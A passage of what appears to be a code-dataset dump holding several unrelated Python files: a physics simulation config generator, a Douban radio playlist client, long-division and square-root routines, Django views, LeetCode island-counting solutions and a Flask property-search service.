                                 _optimizer, _alpha, _beta1, _beta2, _epscut, _discarded_samples,
                                 _discarded_samples_on_init, _method, _n_samples, _diag_shift, _use_iterative,
                                 _use_cholesky, _target, _n_iter, _d_max)

    # Named unpacking replaces the original opaque i[0]..i[21] indexing.
    for (L, J, sampler, bond_dim, symmetry_period, sigma_rand, diagonal,
         optimizer, alpha, beta1, beta2, epscut, discarded, discarded_on_init,
         method, n_samples, diag_shift, use_iterative, use_cholesky,
         target, n_iter, d_max) in all_comb:

        # The two original branches differed only in the sampler section:
        # MetropolisHop additionally carries d_max.
        sampler_conf = {"type": sampler}
        if sampler == "MetropolisHop":
            sampler_conf["d_max"] = d_max

        dicc = {
            "input": {
                "L": L, "J": J,
                "machine": {"type": "MPS", "BondDim": bond_dim, "SymmetryPeriod": symmetry_period,
                            "SigmaRand": sigma_rand, "Diagonal": diagonal},
                "sampler": sampler_conf,
                "optimizer": {"type": optimizer, "alpha": alpha, "beta1": beta1,
                              "beta2": beta2, "epscut": epscut},
                "VMC": {"n_samples": n_samples, "discarded_samples": discarded,
                        "discarded_samples_on_init": discarded_on_init, "target": target,
                        "method": method, "diag_shift": diag_shift,
                        "use_iterative": use_iterative, "use_cholesky": use_cholesky},
                "n_iter": n_iter}
        }

        # Find the first free numeric suffix shared by the .ip/.log pair.
        stem = directory + "/" + str(L) + "_" + "MPS" + "_" + str(optimizer) + "_" + str(sampler)
        n = 1
        while os.path.isfile(stem + str(n) + '.ip') or os.path.isfile(stem + str(n) + '.log'):
            n += 1
        filename = stem + str(n) + '.ip'

        with open(filename, 'w') as outfile:
            json.dump(dicc, outfile)

create_ip()
getHomePage():\n url = \"http://www.renren.com/965187997/profile\"\n rsp = opener.open(url)\n\n html = rsp.read().decode()\n with open(\"rsp.html\",\"w\") as f:\n f.write(html)\n\nif __name__ == \"__main__\":\n\n getHomePage()\n\n","sub_path":"spider/v15.py","file_name":"v15.py","file_ext":"py","file_size_in_byte":1214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"586237056","text":"#!/usr/bin/env python2\n\nimport StringIO\nimport urllib\nimport urllib2\nimport thread\nimport json\n\nclass Song(object):\n\tdef __init__(self):\n\t\tself.title = ''\n\t\tself.artist = ''\n\t\tself.album = ''\n\t\tself.pubdate = ''\n\t\tself.cover = ''\n\t\tself.url = ''\n\t\tself.sid = ''\n\t\tself.like = False\n\t\tself.state = ''\n\n\tdef __init__(self, jsonobj):\n\t\tself.title = jsonobj['title']\n\t\tself.artist = jsonobj['artist']\n\t\tself.album = jsonobj['albumtitle']\n\t\tself.pubdate = jsonobj['public_time']\n\t\tself.cover = jsonobj['picture']\n\t\tself.url = jsonobj['url']\n\t\tself.sid = jsonobj['sid']\n\t\tself.like = True if jsonobj['like'] == '1' else False\n\t\tself.state = ''\n\n\tdef toObj(self):\n\t\tobj = {\n\t\t\t'title': self.title,\n\t\t\t'artist': self.artist,\n\t\t\t'album': self.album,\n\t\t\t'pubdate': self.pubdate,\n\t\t\t'cover': self.cover,\n\t\t\t'url': self.url,\n\t\t\t'like': self.like,\n\t\t}\n\t\treturn obj\n\n\tdef info(self, playlist = None):\n\t\tresult = self.shortinfo() + \\\n\t\t\t\t'Artist: %s\\n' % self.artist + 'Title: %s\\n' % self.title + \\\n\t\t\t\t'Album: %s\\n' % self.album + 'Date: %s\\n' % self.pubdate + \\\n\t\t\t\t'Id: %s\\n' % self.sid\n\t\tif playlist:\n\t\t\tresult += 'Pos: %s\\n' % playlist.index(self)\n\t\treturn result\n\n\tdef shortinfo(self):\n\t\treturn 'file: %s\\n' % self.url\n\n\nclass Playlist(object):\n\tdef __init__(self, channel, uid, token, expire, playlist_changed = None):\n\t\tself.playlist = []\n\t\tself.playing = -1\n\n\t\tself.api = 
'http://www.douban.com/j/app/radio/people'\n\t\tself.app_name = 'radio_desktop_win'\n\t\tself.version = '100'\n\t\tself.channel = channel\n\t\tself.uid = uid\n\t\tself.token = token\n\t\tself.expire = expire\n\n\t\tself.playlist_change_cb = playlist_changed\n\n\tdef history(self):\n\t\thistory = StringIO.StringIO()\n\t\ti = len(self.playlist) - 1\n\t\tc = 0\n\t\twhile i >= 0 and c < 10:\n\t\t\tsong = self.playlist[i]\n\t\t\tif song.state:\n\t\t\t\thistory.write('|%s:%s' % (song.sid, song.state))\n\t\t\t\tc += 1\n\t\treturn history.getvalue()\n\n\tdef next(self):\n\t\tif self.playing >= 0:\n\t\t\tself.playlist[self.playing].state = 'e'\n\t\t\tself.sendShortReport('e')\n\n\t\tif len(self.playlist) == 0:\n\t\t\tself.sendLongReport('n')\n\t\telif len(self.playlist) - 1 == self.playing:\n\t\t\tself.sendLongReport('p')\n\t\tself.playing += 1\n\t\tself.notifyCallbacks()\n\t\treturn self.playlist[self.playing]\n\n\tdef getNext(self):\n\t\tif len(self.playlist) > self.playing + 1:\n\t\t\treturn self.playlist[self.playing + 1]\n\t\telse:\n\t\t\treturn self.playlist[0]\n\n\tdef skip(self):\n\t\tif self.playing < 0 or self.playing >= len(self.playlist):\n\t\t\treturn None\n\n\t\tself.playlist[self.playing].state = 's'\n\t\tdel self.playlist[self.playing + 1:]\n\t\tself.sendLongReport('s')\n\n\t\tself.playing += 1\n\t\tself.notifyCallbacks()\n\t\treturn self.playlist[self.playing]\n\n\tdef prev(self):\n\t\tself.playing -= 1\n\t\tif self.playing == -1:\n\t\t\tself.playing = len(self.playlist) - 1\n\t\treturn self.playlist[self.playing]\n\n\tdef ban(self):\n\t\tif self.playing < 0 or self.playing >= len(self.playlist):\n\t\t\treturn None\n\n\t\tself.playlist[self.playing].state = 'b'\n\t\tdel self.playlist[self.playing + 1:]\n\t\tself.sendLongReport('b')\n\n\t\tself.playing += 1\n\t\tself.notifyCallbacks()\n\t\treturn self.playlist[self.playing]\n\n\tdef rate(self):\n\t\tif self.playing < 0 or self.playing >= len(self.playlist):\n\t\t\treturn 
False\n\n\t\tself.playlist[self.playing].like = True\n\t\tself.sendShortReport('r')\n\t\treturn True\n\n\tdef unrate(self):\n\t\tif self.playing < 0 or self.playing >= len(self.playlist):\n\t\t\treturn False\n\n\t\tself.playlist[self.playing].like = False\n\t\tself.sendShortReport('u')\n\t\treturn True\n\n\tdef sendLongReport(self, action):\n\t\tparams = {\n\t\t\t'app_name': self.app_name,\n\t\t\t'version': self.version,\n\t\t\t'user_id': self.uid,\n\t\t\t'expire': self.expire,\n\t\t\t'token': self.token,\n\t\t\t'channel': self.channel,\n\t\t\t'sid': self.playlist[self.playing].sid if self.playing >= 0 else '',\n\t\t\t'h': self.history(),\n\t\t\t'type': action,\n\t\t}\n\t\turl = '%s?%s' % (self.api, urllib.urlencode(params))\n\t\tf = urllib2.urlopen(url)\n\t\tobj = json.load(f)\n\t\tfor s in obj['song']:\n\t\t\ttry:\n\t\t\t\tsong = Song(s)\n\t\t\t\tself.playlist.append(song)\n\t\t\texcept KeyError:\n\t\t\t\tcontinue\n\t\tself.notifyCallbacks()\n\n\tdef sendShortReport(self, action):\n\t\tdef sendRequest(self, action):\n\t\t\tparams = {\n\t\t\t\t'app_name': self.app_name,\n\t\t\t\t'version': self.version,\n\t\t\t\t'user_id': self.uid,\n\t\t\t\t'expire': self.expire,\n\t\t\t\t'token': self.token,\n\t\t\t\t'channel': self.channel,\n\t\t\t\t'sid': self.playlist[self.playing].sid if self.playing >= 0 else '',\n\t\t\t\t'type': action,\n\t\t\t}\n\t\t\turl = '%s?%s' % (self.api, urllib.urlencode(params))\n\t\t\turllib2.urlopen(url)\n\t\tthread.start_new_thread(sendRequest, (self, action, ))\n\n\tdef setPlaying(self, song):\n\t\ttry:\n\t\t\tindex = self.playlist.index(song)\n\t\t\tif index != self.playing:\n\t\t\t\tself.playing = index\n\t\t\t\tself.notifyCallbacks()\n\t\texcept:\n\t\t\tpass\n\n\tdef notifyCallbacks(self):\n\t\tif self.playlist_change_cb:\n\t\t\tself.playlist_change_cb(self.playlist, self.playing)\n# vim: 
noet\n","sub_path":"fmplaylist.py","file_name":"fmplaylist.py","file_ext":"py","file_size_in_byte":4760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"149254823","text":"# takes in numerator, denominator, and places. Places represents how many decimal places to compute\n# going to assume numerator and denominator are both positive integers\ndef longDiv(numerator, denominator, places):\n res = \"\"\n decimal = False\n if numerator < denominator:\n decimal = True\n res = \"0.\"\n numStr = str(numerator)\n numIndex = 0\n decimalPlaces = 0\n remainder = int(numStr[numIndex])\n while(remainder != 0 and decimalPlaces < places):\n if remainder >= denominator:\n i = 0\n while (i < 10):\n i = i + 1\n if i * denominator > remainder:\n i = i - 1\n break\n res = res + str(i)\n if decimal:\n decimalPlaces = decimalPlaces + 1\n remainder = int(str(remainder - i * denominator))\n else:\n if res != \"\" and res != \"0.\":\n res = res + \"0\"\n if decimal:\n decimalPlaces = decimalPlaces + 1\n \n if remainder == 0:\n break\n numIndex = numIndex + 1\n if numIndex == len(numStr):\n if \".\" not in res:\n res = res + \".\"\n decimal = True\n numStr = numStr + \"0\"\n \n remainder = int(str(remainder) + numStr[numIndex])\n print(res)\n return res\n\n# sqrt will only take stuff > 1\ndef sqrtLongDiv(num, lim):\n decimalPlace = 0\n res = \"\"\n numStr = str(num)\n currDividend = \"\"\n front = -1\n back = -1\n if len(numStr) == 1 or len(numStr)%2 != 0:\n front = 0\n back = 1\n currDividend = numStr\n else:\n front = 0\n back = 2\n currDividend = numStr[front: back]\n divisor = \"\"\n\n # finds first digit\n currDivisor = 1\n while currDivisor**2 <= int(currDividend):\n currDivisor = currDivisor + 1\n currDivisor = currDivisor - 1\n res = str(currDivisor)\n remainder = int(currDividend) - currDivisor**2\n \n # find rest of the digits\n while len(res[decimalPlace:]) < lim and remainder != 0:\n currDividend = str(remainder)\n 
currDivisor = str(int(res) * 2)\n i = 0\n if back + 2 > len(numStr):\n if decimalPlace == 0:\n decimalPlace = len(res)\n numStr = numStr + \"00\"\n front = back\n back = back + 2\n currDividend = currDividend + numStr[front:back]\n while int(currDivisor + str(i)) * i <= int(currDividend):\n i = i + 1\n i = i - 1\n remainder = int(currDividend) - int(currDivisor + str(i)) * i\n # print(res, remainder, currDividend, currDivisor)\n res = res + str(i)\n if decimalPlace != 0:\n res = res[:decimalPlace] + \".\" + res[decimalPlace:]\n print(res)\n return res\n\ndef main():\n import math\n assert longDiv(10, 4, 20) == \"2.5\"\n assert longDiv(1260257, 37, 20) == \"34061\"\n assert longDiv(1, 3, 20) == \"0.33333333333333333333\"\n assert longDiv(10, 3, 20) == \"3.33333333333333333333\"\n assert longDiv(3923, 6173, 257) == \"0.63550947675360440628543657864895512716669366596468491819212700469787785517576543009881743074680058318483719423294994330147416167179653329013445650413089259679248339543171877531184189211080511906690426048922728009071764134132512554673578486959339057184513202\"\n\n assert sqrtLongDiv(2,20) == \"1.41421356237309504880\"\n assert sqrtLongDiv(1225,10) == \"35\"\n assert sqrtLongDiv(4,10) == \"2\"\n assert sqrtLongDiv(100,10) == \"10\"\n assert sqrtLongDiv(49,10) == \"7\"\n assert sqrtLongDiv(10000,10) == \"100\"\n assert sqrtLongDiv(4356,10) == \"66\"\n assert sqrtLongDiv(625,10) == \"25\"\n\nif __name__ == '__main__':\n main()","sub_path":"misc_funcs/longDiv.py","file_name":"longDiv.py","file_ext":"py","file_size_in_byte":3721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"348623702","text":"from django.http import HttpResponse, HttpRequest\nfrom django.shortcuts import render\nfrom django.urls import reverse\n\nfrom recipe_db.models import Recipe, Style, Hop, Fermentable, Yeast\nfrom web_app.charts.fermentable import FermentableChartFactory\nfrom web_app.charts.hop import HopChartFactory\nfrom 
web_app.charts.style import StyleChartFactory\nfrom web_app.charts.yeast import YeastChartFactory\nfrom web_app.meta import PageMeta, HomeMeta\n\n\ndef home(request: HttpRequest) -> HttpResponse:\n recipes = Recipe.objects.count()\n meta = HomeMeta().get_meta()\n return render(request, 'index.html', {'recipes': recipes, 'meta': meta})\n\n\ndef legal(request: HttpRequest) -> HttpResponse:\n meta = PageMeta.create('Legal', 'Legal information about Beer Analytics', url=reverse('legal'))\n meta.extra_props = {'robots': 'noindex'}\n return render(request, 'legal.html', {'meta': meta})\n\n\ndef about(request: HttpRequest) -> HttpResponse:\n recipes = Recipe.objects.count()\n meta = PageMeta.create('About', url=reverse('about'))\n return render(request, 'about.html', {'recipes': recipes, 'meta': meta})\n\n\ndef sitemap(request: HttpRequest) -> HttpResponse:\n styles = Style.objects.filter(recipes_count__gt=0)\n hops = Hop.objects.filter(recipes_count__gt=0)\n fermentables = Fermentable.objects.filter(recipes_count__gt=0)\n yeasts = Yeast.objects.filter(recipes_count__gt=0)\n\n return render(request, 'sitemap.xml', {\n 'styles': styles,\n 'hops': hops,\n 'fermentables': fermentables,\n 'yeasts': yeasts,\n 'style_chart_types': StyleChartFactory.get_types(),\n 'hop_chart_types': HopChartFactory.get_types(),\n 'fermentable_chart_types': FermentableChartFactory.get_types(),\n 'yeast_chart_types': YeastChartFactory.get_types(),\n }, content_type='text/xml')\n","sub_path":"web_app/views/misc.py","file_name":"misc.py","file_ext":"py","file_size_in_byte":1834,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"400817781","text":"import webbrowser # import the webrowser which is used to open the the trailer\r\n\r\n\r\nclass Movie(): # used to define the class MOVIE\r\n \"\"\"bang bang bangati bang, bang bang bandati bang\"\"\"\r\n VALID_RATINGS = [\"1\", \"2\", \"3\", \"4\"]\r\n \r\n def __init__(self, movie_title, 
movie_storyline,\r\n movie_poster, youtube_trailer):\r\n self.title = movie_title\r\n self.storyline = movie_storyline\r\n self.poster = movie_poster\r\n self.trailer = youtube_trailer\r\n \r\n def show_trailer(self): # used to open the trailer\r\n webbrowser.open(self.trailer)\r\n \r\n","sub_path":"media.py","file_name":"media.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"262036974","text":"#\n# @lc app=leetcode id=200 lang=python3\n#\n# [200] Number of Islands\n#\n# https://leetcode.com/problems/number-of-islands/description/\n#\n# algorithms\n# Medium (44.04%)\n# Likes: 3769\n# Dislikes: 137\n# Total Accepted: 507.3K\n# Total Submissions: 1.1M\n# Testcase Example:\n# '[[\"1\",\"1\",\"1\",\"1\",\"0\"],\n# [\"1\",\"1\",\"0\",\"1\",\"0\"],\n# [\"1\",\"1\",\"0\",\"0\",\"0\"],\n# [\"0\",\"0\",\"0\",\"0\",\"0\"]]'\n#\n# Given a 2d grid map of '1's (land) and '0's (water), count the number of\n# islands. An island is surrounded by water and is formed by connecting\n# adjacent lands horizontally or vertically. 
You may assume all four edges of\n# the grid are all surrounded by water.\n#\n# Example 1:\n#\n#\n# Input:\n# 11110\n# 11010\n# 11000\n# 00000\n#\n# Output: 1\n#\n#\n# Example 2:\n#\n#\n# Input:\n# 11000\n# 11000\n# 00100\n# 00011\n#\n# Output: 3\n#\n#\n\n# @lc code=start\nfrom typing import List\n\n\nclass UF:\n def __init__(self, grid: List[List[str]]):\n self.parents = [-1 for _ in range(len(grid) * len(grid[0]))]\n self.sizes = [1 for _ in range(len(grid) * len(grid[0]))]\n self.count = 0\n for i in range(len(grid)):\n for j in range(len(grid[0])):\n if grid[i][j] == \"1\":\n self.count += 1\n lst_coord = i * len(grid[0]) + j\n self.parents[lst_coord] = lst_coord\n return\n\n def find(self, coord: int) -> int:\n root_coord = coord\n while root_coord != self.parents[root_coord]:\n root_coord = self.parents[root_coord]\n while coord != root_coord:\n temp = self.parents[coord]\n self.parents[coord] = root_coord\n coord = temp\n return root_coord\n\n def union(self, coord1: int, coord2: int) -> None:\n root1 = self.find(coord1)\n root2 = self.find(coord2)\n if root1 == root2:\n return\n if self.sizes[root1] >= self.sizes[root2]:\n self.parents[root2] = root1\n self.sizes[root1] += self.sizes[root2]\n else:\n self.parents[root1] = root2\n self.sizes[root2] += self.sizes[root1]\n self.count -= 1\n return\n\n\nclass Solution:\n def numIslands(self, grid: List[List[str]]) -> int:\n return self.union_find_soln(grid)\n\n def union_find_soln(self, grid: List[List[str]]) -> int:\n \"\"\"\n Union Find solution\n \"\"\"\n if grid is None or len(grid) == 0 or len(grid[0]) == 0:\n return 0\n\n uf = UF(grid)\n\n for i in range(len(grid)):\n for j in range(len(grid[0])):\n if grid[i][j] == \"1\":\n coord1 = i * len(grid[0]) + j\n if i < len(grid) - 1 and grid[i + 1][j] == \"1\":\n coord2 = (i + 1) * len(grid[0]) + j\n uf.union(coord1, coord2)\n if j < len(grid[0]) - 1 and grid[i][j + 1] == \"1\":\n coord2 = i * len(grid[0]) + j + 1\n uf.union(coord1, coord2)\n return 
uf.count\n\n def dfs_soln(self, grid: List[List[str]]) -> int:\n \"\"\"\n DFS solution\n \"\"\"\n if grid is None or len(grid) == 0 or len(grid[0]) == 0:\n return 0\n\n def erase_1s(row: int, col: int) -> None:\n if row < 0 or row == len(grid) or col < 0 or col == len(grid[0]) \\\n or grid[row][col] == \"0\":\n return\n grid[row][col] = \"0\"\n erase_1s(row - 1, col)\n erase_1s(row + 1, col)\n erase_1s(row, col - 1)\n erase_1s(row, col + 1)\n return\n\n count = 0\n for i in range(len(grid)):\n for j in range(len(grid[0])):\n if grid[i][j] == \"1\":\n count += 1\n erase_1s(i, j)\n return count\n\n def bfs_soln(self, grid: List[List[str]]) -> int:\n \"\"\"\n BFS solution\n \"\"\"\n if grid is None or len(grid) == 0 or len(grid[0]) == 0:\n return 0\n\n offsets = (0, 1, 0, -1, 0)\n count = 0\n\n for i in range(len(grid)):\n for j in range(len(grid[0])):\n if grid[i][j] == \"1\":\n count += 1\n todo = []\n todo.insert(0, (i, j))\n grid[i][j] = \"0\"\n while len(todo) != 0:\n curr = todo.pop()\n for k in range(len(offsets) - 1):\n r = curr[0] + offsets[k]\n c = curr[1] + offsets[k + 1]\n if 0 <= r < len(grid) and 0 <= c < len(grid[0]) \\\n and grid[r][c] == \"1\":\n grid[r][c] = \"0\"\n todo.insert(0, (r, c))\n return count\n\n# @lc code=end\n\n\nif __name__ == \"__main__\":\n g = [\n [\"1\", \"1\", \"1\", \"1\", \"0\"],\n [\"1\", \"1\", \"0\", \"1\", \"0\"],\n [\"1\", \"1\", \"0\", \"0\", \"0\"],\n [\"0\", \"0\", \"0\", \"0\", \"0\"]\n ]\n print(Solution().numIslands(g), 1)\n\n g = [\n [\"1\", \"1\", \"0\", \"0\", \"0\"],\n [\"1\", \"1\", \"0\", \"0\", \"0\"],\n [\"0\", \"0\", \"1\", \"0\", \"0\"],\n [\"0\", \"0\", \"0\", \"1\", \"1\"]\n ]\n print(Solution().numIslands(g), 3)\n\n g = [[\"1\"], [\"1\"]]\n print(Solution().numIslands(g), 1)\n","sub_path":"Python/200.number-of-islands.py","file_name":"200.number-of-islands.py","file_ext":"py","file_size_in_byte":5331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} 
+{"seq_id":"140223803","text":"import json, wordninja\nimport pandas as pd\nfrom requests import get\nfrom collections import defaultdict\nfrom math import isnan, nan\n\nfrom flask import request\nfrom time import time\n\nfrom .metadata import PropertyMetaData\nfrom .ranking import PropertyRanker\nfrom .settings import FILE_claims_property, JSON_constraints, KGTK_search\n\nimport warnings\n\nwarnings.filterwarnings(\"ignore\")\n\n\nclass PropertyFinder(object):\n metadata = PropertyMetaData()\n ranker = PropertyRanker()\n\n def __init__(self, host=KGTK_search,\n metadata_constraints=JSON_constraints,\n query_size=500, use_ninja=True, use_part=True):\n self.host = host\n\n self.map_P1696 = self.gen_relation('P1696')\n self.map_P1647 = self.gen_relation('P1647', False)\n self.map_P6609 = self.gen_relation('P6609', False)\n self.map_P1659 = self.gen_relation('P1659')\n\n with open(metadata_constraints) as fp:\n self.constraints = json.load(fp)\n\n self.query_size = query_size\n self.ninja = use_ninja\n self.partial_query = use_part\n\n def _query(self, label, type_=None):\n ''' Given a query string: label,\n get relevant properties from the KGTK-search API\n '''\n response2 = get(\n f'{self.host}/{label}?extra_info=true&language=en&item=property&type=ngram'\n f'&size={self.query_size}&instance_of=',\n verify=False)\n query_result = set([x['qnode'] for x in response2.json()])\n\n try:\n # Split word using wordninja\n if len(query_result) == 0 and self.ninja:\n label_splitted = ' '.join([x[:10] for x in wordninja.split(label)])\n response2 = get(\n f'{self.host}/{label_splitted}?language=en&item=property'\n f'&type=ngram&size={self.query_size}&instance_of=',\n verify=False)\n for x in response2.json():\n query_result.add(x['qnode'])\n\n # Use a part of the input as the query string\n if len(query_result) == 0 and self.partial_query:\n\n label_splitted = [x[:10] for x in wordninja.split(label)]\n\n response2a = get(\n 
f'{self.host}/{label_splitted[0]}?extra_info=true&language=en&item=property'\n f'&type=ngram&size={self.query_size}&instance_of=',\n verify=False)\n for x in response2a.json():\n query_result.add(x['qnode'])\n\n response2b = get(\n f'{self.host}/{label_splitted[-1]}?extra_info=true&language=en&item=property'\n f'&type=ngram&size={self.query_size}&instance_of=',\n verify=False)\n for x in response2b.json():\n query_result.add(x['qnode'])\n\n if len(label_splitted) > 2:\n\n response2c = get(\n f'{self.host}/{label_splitted[0] + label_splitted[1]}?extra_info=true'\n f'&language=en&item=property&type=ngram&size={self.query_size}&instance_of=',\n verify=False)\n for x in response2c.json():\n query_result.add(x['qnode'])\n\n response2d = get(\n f'{self.host}/{label_splitted[-2] + label_splitted[-1]}?extra_info=true'\n f'&language=en&item=property&type=ngram&size={self.query_size}&instance_of=',\n verify=False)\n for x in response2d.json():\n query_result.add(x['qnode'])\n except:\n return []\n\n if type_:\n return [x for x in query_result if\n PropertyFinder.metadata.check_property_exists(x) and PropertyFinder.metadata.check_type(x, type_)]\n\n return [x for x in query_result]\n\n def filter_by_set(self, s, l):\n ''' Return all the unique values in l,\n save all the values to set s\n '''\n r = [i for i in l if not i in s]\n r = list(set(r))\n for i in r:\n s.add(i)\n return s, r\n\n def gen_relation(self, label, twoway=True):\n ''' Given a relation R, generate the triples such that\n X R Y, containing all X, Y that satisfying this relation\n '''\n pr = pd.read_csv(FILE_claims_property, sep='\\t', usecols=['node1', 'label', 'node2'])\n pr = pr[pr['label'].apply(lambda x: x == label)].reset_index(drop=True)\n pr = pr[['node1', 'node2']]\n\n pr1 = pr.groupby('node1')['node2'].apply(list).reset_index()\n pr_dict = pr1.set_index('node1').to_dict()['node2']\n\n pr_dict_r = defaultdict(list)\n for k, v in pr_dict.items():\n for vi in v:\n pr_dict_r[k].append(vi)\n\n return 
pr_dict_r\n\n def get_candidates(self, name_, type_):\n ''' Get all the candidates given a query string: name_, and the specified type_\n Returns: Dict[List]\n 1 -> properties whose label/aliases matches with query string\n 2 -> relevant properties to category (1), using P1696, P1647, P6609\n 3 -> relevant properties to category (1), using P1659\n '''\n result = self._query(name_, type_)\n\n ranked = {}\n loaded = set()\n loaded, ranked[1] = self.filter_by_set(loaded, result)\n\n ranked[2] = []\n for z in result:\n ranked[2] += self.map_P1696[z] + self.map_P1647[z] + self.map_P6609[z]\n loaded, ranked[2] = self.filter_by_set(loaded, ranked[2])\n\n ranked[3] = []\n for z in result:\n ranked[3] += self.map_P1659[z]\n loaded, ranked[3] = self.filter_by_set(loaded, ranked[3])\n\n if type_ is None:\n return ranked\n\n r = {}\n r[0] = []\n for i, L in enumerate(ranked):\n r[i + 1] = []\n for pnode in ranked[L]:\n if PropertyFinder.metadata.check_type(pnode, type_):\n r[i + 1].append(pnode)\n\n r[4] = []\n\n return r\n\n def filter_ranked(self, ranked, params):\n ''' Rule-based filtering\n Using several wikidata constraints\n '''\n ranked = self.filter_by_item(ranked)\n\n if params['scope'] != 'both':\n ranked = self.filter_by_scope(ranked, params['scope'])\n\n ranked = self.filter_by_allowed_qualifiers(ranked, params['constraint'])\n ranked = self.filter_by_required_qualifiers(ranked, params['constraint'])\n\n ranked = self.filter_by_conflicts(ranked, params['otherProperties'])\n return ranked\n\n def filter_by_item(self, ranked):\n\n r = defaultdict(list)\n for k, pnodes in ranked.items():\n for pnode in pnodes:\n if pnode in self.constraints and 'noitem' in self.constraints[pnode]:\n continue\n r[k].append(pnode)\n return r\n\n def filter_by_scope(self, ranked, scope='both'):\n\n r = defaultdict(list)\n for k, pnodes in ranked.items():\n for pnode in pnodes:\n\n if not pnode in self.constraints:\n r[k].append(pnode)\n continue\n\n info = self.constraints[pnode]\n if 
scope == 'qualifier':\n if 'scope' in info and not 'Q' in info['scope']:\n if 'scope_man' in info:\n continue\n r[4].append(pnode)\n continue\n else:\n if 'scope' in info and not 'V' in info['scope']:\n if 'scope_man' in info:\n continue\n r[4].append(pnode)\n continue\n r[k].append(pnode)\n\n return r\n\n def filter_by_allowed_qualifiers(self, ranked, constraint):\n\n if constraint is None:\n return ranked\n\n if not constraint in self.constraints:\n return ranked\n\n constr_dic = self.constraints[constraint]\n\n if not 'allowed_qualifiers' in constr_dic:\n return ranked\n\n r = defaultdict(list)\n for k, pnodes in ranked.items():\n for pnode in pnodes:\n if not pnode in constr_dic['allowed_qualifiers']:\n continue\n r[k].append(pnode)\n\n return r\n\n def filter_by_required_qualifiers(self, ranked, constraint):\n\n if constraint is None:\n return ranked\n\n if not constraint in self.constraints:\n return ranked\n\n constr_dic = self.constraints[constraint]\n\n if not 'required_qualifiers' in constr_dic:\n return ranked\n\n r = defaultdict(list)\n for k, pnodes in ranked.items():\n for pnode in pnodes:\n if pnode in constr_dic['required_qualifiers']:\n r[0].append(pnode)\n continue\n r[k].append(pnode)\n\n return r\n\n def filter_by_conflicts(self, ranked, otherProperties):\n\n if otherProperties == '':\n return ranked\n\n properties = otherProperties.split(',')\n disallowed = set()\n for pnode in properties:\n if pnode in self.constraints and 'conflicts' in self.constraints[pnode]:\n for p in self.constraints[pnode]['conflicts']:\n disallowed.add(p)\n\n r = defaultdict(list)\n for k, pnodes in ranked.items():\n for pnode in pnodes:\n if pnode in disallowed:\n continue\n r[k].append(pnode)\n\n return r\n\n def find_property(self, label, params):\n\n params['type'] = PropertyFinder.metadata.get_type_alias(params['type'])\n\n candidates = self.get_candidates(label, params['type'])\n\n if params['filter']:\n candidates = self.filter_ranked(candidates, params)\n\n for 
level in candidates:\n candidates[level] = PropertyFinder.ranker.rank(candidates[level], label, PropertyFinder.metadata,\n scope=params['scope'])\n\n return dict(sorted(candidates.items(), key=lambda x: x[0]))\n\n def generate_top_candidates(self, params, size=10):\n ''' argument params may include the following parameters:\n type\n scope\n filter\n constraint\n otherProperties\n '''\n\n if not 'type' in params:\n params['type'] = None\n if not 'scope' in params:\n params['scope'] = 'both'\n if not 'filter' in params:\n params['filter'] = True\n if not 'constraint' in params:\n params['constraint'] = None\n if not 'otherProperties' in params:\n params['otherProperties'] = ''\n\n label = params.pop('label')\n\n candidates = self.find_property(label, params)\n\n results = []\n for level in candidates:\n for pnode, score in candidates[level].items():\n\n results.append(PropertyFinder.metadata.get_info(pnode, score, params['extra_info']))\n if len(results) >= size:\n break\n\n if len(results) >= size:\n break\n\n return results\n\n def _build_params(self, label, type_, scope='both', filter='true', constraint=None,\n otherProperties='', extra_info=False):\n ''' Build the dictionary of parameters\n '''\n return {'label': label,\n 'type': type_,\n 'scope': scope,\n 'filter': filter.lower() == 'true',\n 'constraint': constraint,\n 'otherProperties': otherProperties,\n 'extra_info': extra_info.lower() == 'true'}\n\n def search(self):\n ''' Flask API interface\n '''\n label = request.args.get('label', '')\n if label == '':\n return {'Error': 'label (query string) needed. 
Please enter the following parameter ?label=xxx'}, 400\n\n type_ = request.args.get('data_type', None)\n if type_ is None:\n type_ = request.args.get('type', None)\n\n if not type_ is None and not PropertyFinder.metadata.check_type_allowed(type_):\n return {'Error': 'Input data_type is not supported'}, 400\n\n # Check remote is running\n response = get(f'{self.host}/time?extra_info=true&language=en&item=property&type=ngram&size=1&instance_of=',\n verify=False)\n if response.status_code >= 500:\n return {'Error': 'Remote service for querying properties is down.'}, 500\n\n scope = request.args.get('scope', 'both')\n filter = request.args.get('filter', 'true')\n constraint = request.args.get('constraint', None)\n otherProperties = request.args.get('otherProperties', '')\n size = request.args.get('size', 10)\n extra_info = request.args.get('extra_info', 'false')\n\n try:\n size = int(size)\n except:\n return {'Error': 'size parameter must be an integer'}, 400\n\n params = self._build_params(label, type_, scope, filter, constraint,\n otherProperties, extra_info)\n\n return self.generate_top_candidates(params, size)\n","sub_path":"api/PropertyFinder2.py","file_name":"PropertyFinder2.py","file_ext":"py","file_size_in_byte":13537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"641670847","text":"import importlib.util as im_util\nimport re\nimport os\nimport torch\nimport numpy as np\nimport random\n\ndef import_file(file_name):\n spec = im_util.spec_from_file_location(\".\", f\"{file_name}.py\")\n file = im_util.module_from_spec(spec)\n spec.loader.exec_module(file)\n return file\n\n\ndef convert_str_from_camel_to_underscore(input):\n return re.sub(r'(? 
